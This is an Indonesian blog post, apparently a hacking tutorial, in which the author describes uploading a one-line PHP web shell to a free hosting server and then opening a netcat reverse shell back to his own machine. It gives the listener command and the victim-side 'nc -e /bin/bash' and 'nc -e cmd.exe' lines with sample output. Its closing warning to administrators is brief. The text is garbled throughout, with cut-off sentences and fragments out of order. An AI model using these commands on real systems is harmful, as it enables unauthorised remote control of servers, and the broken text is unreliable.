Back-Connect Netcat




script php :


== sh.php ===
<?
$sh = system($sh);
?>

Dan setelah itu s

Setelah itu saya langsung "mengunjungi" situs gratisan saya ,lalu saya uploa
daya mencoba menjalankannya dan berhasil

Karena kalau menjalankan shell dari script php tidak "leluasa" maka

k

TIDAK JALAN ....

Mengapa ? , karena di server tersebut user gratisan tid

Setelah itu saya upload script connect.pl dari bosen.net, dan menjalankannya

tapi ternyata

..hik..hik..h
iak diizinkan untuk mengakses PERL ....

Stress .....? , Iya

Namun ternyata keberuntungan berpihak pada saya .., seviour mengontak saya dari kantor

[Yahoo Messenger ]

seviour> Woii

1>Gimana ?

az001>Woii
seviour> Ngapain lu
az001>Lagi iseng nih,tapi sial ...
seviour>Sial kenapa ?
az001>Teknik remotebs gak bisa dipake, nggak ada PERLnya
seviour>Ooooo, itu mah gampang
az0
0 seviour>NETCAT !!!
az001>Sial, kok gw lupa yach


Ternyata saya melupakan sesuatu, iya .. NETCAT , tools paling ampuh di dunia saat ini
bisa dipakai untuk itu.
Tapi ada nggak ya ....



===========

#whereis nc
nc: /usr/local/bin/

ternyata ada ...

Langsung saya menjalankan netcat tersebut ...

======================================================================================
= Ini adalah langkahnya diurutkan dari langkah yang pertama :



[Attacker]

c:\> nc -v -n -l -p 42001
listening on [any] 42001 ...


[Victim]

nc -e /bin/bash 141.118.0.1 42001


[Attacker]


.0.1] from (UNKNOWN) [202

C:\>nc -v -n -l -p 42001
listening on [any] 42001 ...
connect to [141.118.0.1] from (UNKNOWN) [141.118.0.2] 1036



Setelah Attacker menerima pesan yang kurang lebih adalah
"connect to [141.11
8..100.10.20] 1036"
,maka setelah itu si attacker dapat menuliskan command linux.

Misal:

[Attacker]

C:\>nc -v -n -l -p 42001
listening on [any] 42001 ...
connect to [141.118.0.1] from (UNKNOWN) [141.118.0.2] 1036

k mess

ls /boot
System.map@ initrd-2.4.18-6mdk.img lilo-text/
System.map-2.4.18-6mdk initrd.img@ map
boot.0800 kernel.h@ mbr.b
boot.b@ kernel.h-2.4.18-6m
dage@
chain.b lilo@ os2_d.b
config@ lilo-bmp/ us-latin1.klt
config-2.4.18-6mdk lilo-graphic/ vmlinuz@

an] [IP Attacker] [port yg di gunakan attacker]



Note : Dengan as

grub/ lilo-menu/ vmlinuz-2.4.18-6mdk



Rumus Umum =>

Attacker :

nc -v -n -l -p [port yang digunakan]


Victim :

nc -e [Shell yang akan diguna
kumsi IP 141.118.0.1 adalah IP Public

Kalau target windows :
[Attacker]
Langkahnya Sama

[Victim]
nc -e cmd.exe [ip attacker] [port yang digunakan attacker]


et => Download videonya

Yang membuat saya bingung dan harus menjadi perhatian kita semua adalah ...

===================================================================================================EOF


Bingung memahami tulisan diatas :
Kunjungi www.corenets.
n

- KENAPA Option DGAPING_SECURITY_HOLE diaktifkan
- Jika 'terpaksa' menginstall netcat dan mengaktifkan Option itu, kenapa Si admin waktu mengompile
netcat menggunakan :

make install


atau :


"Mungkin adminnya sedang belajar menginstall ?" => ????????



Tulisan in

- Kenapa dia memberi izin kepada user (apache dalam hal ini) untuk mengakses netcat



Saya mungkin dapat menjawabnya dengan :

"Mungkin gw adalah seorang yang sangat beruntung di dunia ini "


i dibuat agar para "Admin" di luar sana berhati-hati dalam "menginstall" suatu aplikasi tertentu
yang dapat "membahayakan" .




Referensi :
- http://www.corenets.net
- Remote BackShell , Author: the_day
- # man netcat


- google.com
Auth: AZ001
Share on Google Plus

About Elmirakom

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment